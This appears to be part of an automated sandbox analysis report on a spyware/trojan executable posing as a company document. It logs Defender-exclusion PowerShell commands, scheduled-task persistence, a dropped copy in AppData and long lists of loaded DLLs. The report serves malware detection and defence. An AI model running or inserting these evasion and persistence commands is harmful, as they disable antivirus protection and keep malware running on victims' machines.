                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8289.tmpJump to behavior
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000003028000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.000000000301C000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeVirustotal: Detection: 60%
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile read: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: cryptsp.dllJump to behavior
